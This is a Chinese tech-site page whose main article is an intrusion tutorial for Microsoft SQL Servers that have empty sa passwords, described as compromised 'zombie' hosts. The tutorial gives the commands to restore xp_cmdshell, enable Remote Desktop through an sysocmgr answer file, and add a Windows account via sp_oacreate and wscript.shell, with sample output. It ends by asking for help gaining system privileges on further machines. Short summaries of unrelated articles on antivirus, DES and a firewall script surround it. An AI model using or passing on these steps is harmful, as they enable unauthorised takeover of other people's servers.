+设为首页   +添加到收藏夹
首页·栏目 >  软件资讯  |  技术专题  |  编程技术  |  数据库  |  服务器  |  项目方案  |  网站架构  |  应用指南  |  技术教程  |  项目开发
    当前位置:首页 » 软件开发
开发技术指南» 文章正文
    引言: 用SQL连接器恢复XP_CMDSHLLE的命令作者: lovez
 

 

 ·大型网络防病毒实施    »显示摘要«
    摘要:大型网络防病毒实施上半年做了一个全中国最大的一个防病毒系统的case,由于保密的原因,一直不能公开发表项目的经验给大家分享。那网络结构个其中涉及的人员以xx代替和不能太详细。技术也很少,主要是过程。呵呵。 应该说这个客户还是比较成熟和配合的用户。在进行这个项目之前,先请了hp给他做了一个安全服务咨询,制定了一个全方位的安全规划和产品选型依据和项目控制要求。 在做了安全规划后,确定要上防病毒系统,于......
 ·如何实现des算法    »显示摘要«
    摘要: des( data encryption standard)算法,于1977年得到美国政府的正式许可,是一种用56位密钥来加密64位数据的方法。des算法以被应用于许多需要安全加密的场合。(如:unix的密码算法就是以des算法为基础的)。下面是关于如何实现des算法的语言性描述,如果您要其源代码,可以到http//assassin.yeah.net下载,后者您有任何问题也可以写信给我(assa......


SQL恢复XPCMDSHLL,以及XPLOG70.DLL被删,直接用SQL连接器开启3389
上一页   ...

用sql连接器恢复xp_cmdshlle的命令(1)sql query analyzersp_addextendedproc xp_cmdshell,@dllname=xplog70.dll(2)首先在sqlexec sunx version的format选项里填上%s,在cmd选项里输入sp_addextendedproc xp_cmdshell,xpsql70.dll去除sp_dropextendedproc xp_cmdshell(3)mssql2000sp_addextendedproc xp_cmdshell,xplog70.dll修改sa密码 sp_password @old = null, @new = complexpwd, @loginame =sa这个很简单,自己堵后门用:)二,在可以运行xp_cmdshell的机器上直接开3389不需要上传的实例过程:连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机命令:xp_cmdshell "type c:\boot.ini" // 输入命令,看系统,server版的才能 开3389执行成功,结果:[boot loader]timeout=30default=multi(0)disk(0)rdisk(0)partition(1)\winnt[operating systems]multi(0)disk(0)rdisk(0)partition(1)\winnt="microsoft windows 2000 server" /fastdetectmulti(0)disk(0)rdisk(0)partition(1)\winnt="microsoft windows 2000 server" /fastdetect命令:xp_cmdshell "echo [components] > c:\duguxike" //在c盘根目录建写入一个文件,文件名duguxike大家可以自己改为自己的执行成功,结果:命令:xp_cmdshell "echo tsenable = on >> c:\duguxike" //追加写入执行成功,结果:命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确执行成功,结果:[components] tsenable = on tsenable = on 命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389,成功的话过会肉机会重启!!执行成功,结果:getlocalmanagedapplications returned (2)之后就看大家的了,不过要记得册除新建的duguxike文件哦!!三不需要xp_cmdshll直接添加系统帐号,对xplog70.dll被删很有效declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:\winnt\system32\cmd.exe /c net user gchn aaa /add--content>如果xpcmdshll被删了第一条恢复第二条可以执行xpcmdshell但是无法利用差异备分来上传的情况下使用(本人win2000下测试成功)第三条xplog70.dll被删除的情况下直接添加帐号前提对方了开了3389 139 23才好用但是我现在无法在xplog70.dll被删而且没有开3389的机器上拿到系统权限哪为高人来指点一下!


 ·一个经典的防火墙脚本(有多种参数可定义)    »显示摘要«
    摘要:一个经典的防火墙脚本。网络拓展图为:eth0 连接lan,eth1连接到路由器,eth2连接到dmz区。#!/bin/bash## iptables user space configuration utility pathiptables="/usr/local/sbin/iptables"# modules utility pathmodprobe="/sbin/......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE